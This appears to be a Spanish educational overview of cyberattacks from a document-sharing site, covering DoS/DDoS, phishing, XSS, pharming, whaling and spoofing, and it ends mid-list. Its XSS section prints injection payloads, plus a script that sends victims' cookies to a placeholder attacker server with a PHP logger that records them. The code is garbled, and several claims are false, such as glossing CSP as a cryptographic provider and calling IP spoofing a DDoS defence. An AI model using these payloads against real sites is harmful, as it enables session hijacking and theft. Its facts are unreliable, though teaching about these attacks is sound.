Los ataques DoS y DDoS buscan sobrecargar los recursos de un sistema o red mediante un gran flujo de tráfico entrante, haciendo que el servicio sea inaccesible para los usuarios legítimos. Los ataques de phishing engañan a las víctimas para que revelen información confidencial haciéndose pasar por entidades de confianza. Las vulnerabilidades de cross-site scripting permiten inyectar código malicioso en páginas web visitadas por el usuario.
0 calificaciones0% encontró este documento útil (0 votos)
17 vistas10 páginas
Los ataques DoS y DDoS buscan sobrecargar los recursos de un sistema o red mediante un gran flujo de tráfico entrante, haciendo que el servicio sea inaccesible para los usuarios legítimos. Los ataques de phishing engañan a las víctimas para que revelen información confidencial haciéndose pasar por entidades de confianza. Las vulnerabilidades de cross-site scripting permiten inyectar código malicioso en páginas web visitadas por el usuario.
Los ataques DoS y DDoS buscan sobrecargar los recursos de un sistema o red mediante un gran flujo de tráfico entrante, haciendo que el servicio sea inaccesible para los usuarios legítimos. Los ataques de phishing engañan a las víctimas para que revelen información confidencial haciéndose pasar por entidades de confianza. Las vulnerabilidades de cross-site scripting permiten inyectar código malicioso en páginas web visitadas por el usuario.
Los ataques DoS y DDoS buscan sobrecargar los recursos de un sistema o red mediante un gran flujo de tráfico entrante, haciendo que el servicio sea inaccesible para los usuarios legítimos. Los ataques de phishing engañan a las víctimas para que revelen información confidencial haciéndose pasar por entidades de confianza. Las vulnerabilidades de cross-site scripting permiten inyectar código malicioso en páginas web visitadas por el usuario.
Descargue como DOCX, PDF, TXT o lea en línea desde Scribd
Descargar como docx, pdf o txt
Está en la página 1de 10
ATAQUES INFORMATICOS
(CIBERATAQUES)
ATAQUE DoS y DDoS: En seguridad informática, un ataque de denegación
de servicio, llamado también ataque DoS (por sus siglas en inglés, Denial Of Service), es un ataque a un sistema de computadoras o red que causa que un servicio o recurso sea inaccesible a los usuarios legítimos. Normalmente provoca la perdida de la conectividad con la red por el consumo del ancho de la red de la víctima o sobrecarga de los recursos computacionales del sistema atacado. Los ataques DoS se generan mediante la saturación de los puertos con múltiples flujos de información, haciendo que el servidor se sobrecargue y no pueda seguir prestando su servicio. Por eso se le denomina denegación, pues hace que el servidor no pueda atender la cantidad enorme de solicitudes. Esta técnica es usada por los crackers o piratas informáticos para dejar fuera de servicio servidores objetivo. A nivel global, este problema ha ido creciendo, en parte por la mayor facilidad para crear ataques y también por la mayor cantidad de equipos disponibles mal configurados o con fallos de seguridad que son explotados para generar estos ataques. Una ampliación del ataque DoS es el llamado ataque de denegación de servicio distribuido, también llamado DDos, el cual se lleva a cabo generando un gran flujo de información desde varios puntos de conexión hacia un mismo punto de destino. La forma más común de realizar un DDoS es a través de una red de Bots, siendo esta técnica el ciberataque más usual y eficaz por su sencillez tecnológica. En ocasiones, esta herramienta ha sido utilizada como un buen método para comprobar la capacidad de tráfico que un ordenador puede soportar sin volverse inestable y afectar a los servicios que presta. Un administrador de redes puede así conocer la capacidad real de cada máquina. Kernel Panic/SACK Panic (Pánico en el Núcleo) Linux : Manipulando el Tamaño Máximo de Segmento y la Retransmisión (redes de datos), pueden ser usador de manera remota para causar un ataque de denegación de servicios por medio de un desborde de entero en el núcleo Linux, incluso causando un Kernel Panic. La vulnerabilidad más crítica bautizada SACK Panic y etiquetada con CVE-2019-11477 debe su nombre a los paquetes de reconocimiento selectivo (SACK). Este protocolo se define en el RFC 2018 (Request For Comments) y RFC 2883, y trata de solventar el problema de las transmisiones innecesarias de paquetes durante una conexión TCP (Transmission Control Protocol) En español: Protocolo de Control de Transmisión. El Kernel Panic es un mensaje mostrado por el núcleo de un sistema operativo una vez detectado un error interno del sistema del cual no se puede recuperar. Los Kernel Panic usualmente proveen información de depuración que es útil solo para los desarrolladores del sistema operativo. Flood: Es un término en ingles que significa literalmente inundación se usa para designar un comportamiento abusivo de la red de comunicaciones, normalmente por la repetición desmesurada de algún mensaje en un corto espacio de tiempo. Un Flood consiste en enviar mucha información en poco tiempo a alguien para intentar saturar su red. La manera de aprovechar esto en los chats, consiste en enviar muchas peticiones de información a la víctima, de forma que esta, al contestar, supere el límite del servidor y este lo eche. Desde la creación de los foros, la palabra Flood se ha extendido a usarse en ellos de igual forma, o sea, refiriéndose a la acción de postear de forma muy seguida con el fin de dejar el servidor inoperativo. También la inundación es un mecanismo de difusión de la información en grupos de nodos conectados aleatoriamente. Si un nodo quiere difundir un mensaje, se lo envía a todos sus vecinos que a su vez se lo reenviaran a todos sus vecinos y así hasta que el mensaje llegue a todos los nodos de la red. El algoritmo garantiza que el mensaje llega a todos los nodos en el menor tiempo posible, a costa de utilizar una cantidad desproporcionada de ancho de banda. Phishing: Es un conjunto de técnicas que persiguen el engaño a una víctima ganándose su confianza haciéndose pasar por una persona, empresa o servicio de confianza (Suplantación de Identidad de tercero de confianza), para manipularla y hacer que realice acciones que no debería realizar (por ejemplo, revelar información confidencial o hacer un click en un enlace). Para realizar el engaño, habitualmente se hace uso de la ingeniería social explotando los instintos sociales de la gente, como es de ayudar o ser eficiente. También mediante la adulación de la víctima, explotando su intrínseca cantidad o necesidad de ser reconocido, baja autoestima, o una persona que busca trabajo. Por ejemplo, enviando correos electrónicos o mostrando publicidades a la víctima diciéndote que ha ganado un premio y que siga un enlace para recibirlo, siendo aquellas promesas falsas (un cebo). Habitualmente el objetivo es robar información, pero otras veces es instalar malware, sabotear sistemas, o robar dinero a través de fraudes. El Phishing está considerada una de las técnicas de robos de contraseñas más utilizadas. Cross-Site Scripting (XSS): Es una secuencia de comandos en sitios cruzados o Cross-Site Scripting es un tipo de vulnerabilidad informática o agujero de seguridad típico de las aplicaciones Web, que puede permitir a una tercera persona inyectar en páginas web visitadas por el usuario código JavaScript o en otro lenguaje similar. Se puede evitar usando medidas como CSP (Proveedor de Servicios Criptográficos). Es posible encontrar una vulnerabilidad de Cross-Site Scripting en aplicaciones que tengas entre sus funciones presentar información en un navegador web u otro contenedor de páginas web. Sin embrago, no se limita a sitios web disponibles en internet, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en sí. XSS Es un vector de ataque que puede ser utilizado para robar información delicada, secuestrar sesiones de usuario, y comprometer el navegador subyugando la integridad del sistema. Las vulnerabilidades XSS han existido desde los primeros días de la Web. Esta situación es habitualmente causada al no validar correctamente los datos de entrada que son usados en cierta aplicación, o no sanear la salida adecuadamente para su presentación como página Web. Esta vulnerabilidad puede estar presente en las siguientes formas: *Directa: (También llamada Persistente): Este tipo de XSS comúnmente filtrado, y consiste en insertar código HTML peligroso en sitios que permitan incluyendo si etiquetas como script o iframe. *Indirecta: (También llamada Reflejada): Este tipo de XSS consiste en modificar valores que la aplicación web utiliza para variables entre dos páginas, sin usar sesiones y sucede cuando hay un mensaje o una ruta en la URL del navegador, en una cookie, o cualquier otra cabecera HTTP (en algunos navegadores y aplicaciones Web, esto podría extenderse al DOM (Document Object Model) del navegador). XSS INDIRECTO (Reflejado): Supongamos que un sitio web tiene la siguiente forma: https://www.example.com/home.asp?frame-menu.asp y que al acceder se creara un documento HTML enlazando con un frame a menu.asp. Este ejemplo. ¿Qué pasaría si se pone como URL del frame un código JavaScript? Javascript:while(1)alert(“Este mensaje saldrá indefinidamente”); Si este enlace lo pone un atacante hacia una víctima, un visitante podrá verlo y vera que es del mismo dominio, suponiendo que no puede ser nada malo y de resultado tendrá un bucle infinito de mensajes. Un atacante en realidad trataría de colocar un script que robe las cookies de la víctima, para después poder personificarse como con su sesión, o hacer automático el proceso con el uso de la biblioteca cURL o alguna similar. De esta forma, al recibir la cookie, el atacante podría ejecutar acciones con los permisos de la víctima sin siquiera necesitar su contraseña. Otro uso común para estas vulnerabilidades es lograr hacer Phishing. Quiere ello decir que la víctima ve en la barra de direcciones un sitio, pero realmente está en otra. La victima introduce su contraseña y se la envía al atacante. Una página como la siguiente: Error.php?error=Usuario%20Invalido Es probablemente vulnerable a XSS indirecto, ya que si escribe en el documento “Usuario invalido”, esto significa que un atacante podría insertar HTML y JavaScript si así se lo desea. Por ejemplo, un tag como <script> que ejecute código JavaScript, cree otra sesión bajo otro usuario y mande la sesión actual al atacante. Para probar vulnerabilidades de XSS en cookies, se puede modificar el contenido de una cookie de forma sencilla, usando el siguiente script. Solamente se debe colocar en la barra de direcciones, y presionar “Enter” Javascript:voidprompt(“Introduce la cookie”,document.cookie).replace(/[;] +/g,function(_){document.cookie-_:}); XSS Directo (Persistente): Funciona localizando puntos débiles en la programación de los filtros de HTML si es que existen, para publicar contenido (como blogs, foros, etc.). Normalmente el atacante tratara de insertar tags como <iframe>, o <script>, pero en caso de fallar, el atacante puede tratar de poner tags que casi siempre están permitidas y es poco conocida su capacidad de ejecutar código. De esta forma el atacante podría ejecutar código malicioso. Ejemplos: Una posibilidad es usar atributos que permiten ejecutar código. <BR STYLE=“behavior: url(http://yoursite/xss.htc);”> <DIV STYLE=“background-image: url(javascript:alert(´XSS´))”> <IMG SRC=X ONERROR=alert(/XSS/)”> AJAX: Usar AJAX para ataques de XSS no es tan conocido, pero si peligroso. Se basa en usar cualquier tipo de vulnerabilidad XSS para introducir un objeto XMLHttps y usarlo para enviar contenido POST.GET. Sin conocimiento del usuario. Este se ha popularizado con gusanos de XSS que se encargan de replicarse por medio de vulnerabilidades de XSS persistentes (aun que la posibilidad de usar XSS reflejados es posible). El siguiente script de ejemplo obtiene el valor de las cookies y seguidamente las enviaría al atacante. Javascript: Var cookiesDeUsuario = document.cookie; Var xhr = new XMLHttpRequiest(); // Objeto Ajax Xhr.open(¨GET¨. ¨www.servidor-atacante.com/cookies.php¨); Xhr.send(´c=¨ + cookiesDeUsuario);
PHP (Servidor el atacante)
<?php $archivo = fopen(‘log2.htm´,´a´); $cookie = $_GET[‘c’]; $ip = getenv (´REMOTE_ADDR’); $RE = $HTTPREFERRER; $fecha=date(“j F, Y, g:i a); Fwrite($archivo, ‘<br />cookie: ‘ .htmlentities($cookie).’ <br />Pagina: ‘ htmlentities($re)); Fwrite($archivo, ‘<br /> IP: ‘ .$ip. ‘<br/> fecha y hora: ‘ .$fecha. ‘ </br>’); Fclose($archivo); ¿> Pharming: Es un tipo de ciberataque que se desarrolló a partir del Phishing. El atacante que implementa esta técnica, por decirlo de esta manera, intenta redirigir el tráfico Web, especialmente los datos de solicitud, a un sitio web fraudulento. Esto se logra explotando vulnerabilidades de software en los sistemas de nombre de dominio (DNS) o en los equipos de los propios usuarios, que permiten a atacantes redirigir el nombre del dominio a otra maquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sido redirigido, accederá en su explorador de internet a la página web del atacante haya especificado. Todos los ordenadores conectados a internet tienen una dirección IP única, que consiste en un numero de 32 bits, representando como 4 octetos de 0 a 255 se parador por un punto. Debido a la dificultad que supondría para los usuarios tener que recordar las direcciones IP de servicios específicos surgieron los Nombres de Dominio a los que se les puede asociar direcciones IP. Un atacante de Pharming remplaza la dirección IP de un sitio web por otra, de un sitio malicioso que es generalmente controlado por el atacante. Los ataques de Pharming pueden realizarse de dos formas: reemplazando la IP en uno o varios servidores DNS, lo que afectaría a todos sus usuarios, o atacando a ordenadores concretos, mediante la modificación del fichero hosts, presente en cualquier sistema Microsoft Windows o Unix, y en casi cualquier equipo moderno en general. La técnica de Pharming se utiliza normalmente para realizar ataques de Phishing, redirigiendo el nombre de dominio de una entidad de confianza a una página web, en apariencia idéntica, pero que en realidad ha sido creada por el atacante para obtener los datos privados del usuario generalmente datos bancarios. Whaling: Es un tipo de ataque de Phishing. Suele dirigirse a personas de alto rango en una empresa – directores generales, directores de operaciones y presidentes- y emplean tácticas más avanzadas y sofisticadas que otros tipos de amenazas. En lugar de enviar correos electrónicos masicos a muchas personas o empresas, los atacantes de Whaling cuentan con una investigación y plantificación previa y están dirigidos a organizaciones específicas. Se utilizan nombres, direcciones, cargos u otra información personal para crear una apariencia más sólida y creíble para el ataque. El objetivo del Whaling es convencer a los objetivos para que compartan credenciales, o bien acceder a redes más valiosas o simplemente robar dinero o datos. Para ello estos ciberataques incitan a los lideres a enviar o transferir dinero a los estafadores o revelar información sensible como contraseñas y nombres de usuario que desbloqueen propiedad intelectual de una empresa. A medida que las organizaciones van reforzando la información en materia de seguridad, los hackers se ven obligados a buscar tácticas más sofisticadas para sus ataques. A diferencia de los correos electrónicos de phishing normales, los de Whaling han ido adoptando características específicas para evitar ser detectados, entre ellas: Terminología profesional y centrada en el mundo empresarial Conocimiento preciso del sector Direcciones de correo electrónico, páginas web y páginas de destino falsificadas Información personal, referencias y anécdotas Utilizando técnicas de ingeniería social, los hackers combinan varias características con contenidos específicos y mensajes urgentes para animar a los destinatarios a actuar con rapidez. Muchos ataques de Whaling incluyen detalles como direcciones falsas que se hace pasar por las de las personas de confianza, páginas de destino detalladas, características personalizadas como el nombre o el cargo del objetivo y llamadas telefónicas de seguimiento. Spoofing: Es una práctica ilegal que consiste en suplantar la identidad electrónica de una persona para ocultar la suya propia. Esta mascará les permite cometer delitos online sin temer las consecuencias, ya que nadie podrá saber cuál es su verdadero nombre, Existen 9 tipos de Spoofing: Spoofing de Correo Electrónico El Email Spoofing es una forma de Phishing muy extendida que consiste en el envío de correos electrónicos haciendo pasar por un remitente falso. Este tipo de Spoofing busca engañar a los remitentes del correo par que faciliten datos privados, contraseñas, o incluso para que realiccen pagos con sus tarjetas de crédito o débito. Sabemos que es prácticamente imposible dejar de utilizar el correo electrónico, sobre todo si trabajas en remoto. Spoofing Web El Spoofing web es una forma de Phishing mediante la cual un atacante replica una web legitima para hacerse pasar por ella y tratar de obtener beneficios mediante su suplantación. Las webs falsas pueden replicar portales legítimos de entidades bancarias, tiendas online, hoteles o agencias de viajes. Los usuarios engañados pueden facilitarles sus datos de acceso o bancarios, lo que permite al hacker consumar su estafa. ARP Spoofing El ARP Spoofing es una forma sofisticada de Spoofing con la que los hackers acceden a una red LAN e interceptan los paquetes de datos que pasan a través de ella. Se trata de un tipo de ataque muy peligroso porque permite al hacker recibir y enviar mensajes dirigidos a una IP especifica, lo que le permite realizar ataques de intermediario de la red. DNS Spoofing El DNS Spoofing es similar al ARP Spoofing, solo que acostumbra a darse en torno al router en lugar de en las redes LAN. El DNS Spoofing permite al hacker hacerse pasar por el servidor DNS que utiliza el router para obtener las direcciones IP a las que quiere acceder el usuario, de forma que el hacker queda en una posición perfecta para recibir las peticiones del usuario, modificar respuestas y realizar un ataque de intermediario. IP Spoofing A diferencia de los tipos de Spoofing anteriores, el IP Spoofing puede utilizarse como forma de protección frente a ciberataques y, de hecho, es la herramienta idónea para prevenir un ataque DDos. Este es el tipo de Spoofing al que puede accederse gracias a una VPN. El IP Spoofing nos permite conectarnos a internet a través de una IP diferente a la nuestra IP real, lo que impide a posibles atacantes dirigir ataques DDos contra nuestra IP y, además nos GPS Spoofing Caller ID Spoofing Ataque de Man-in-the-middle (MitM) Facial Spoofing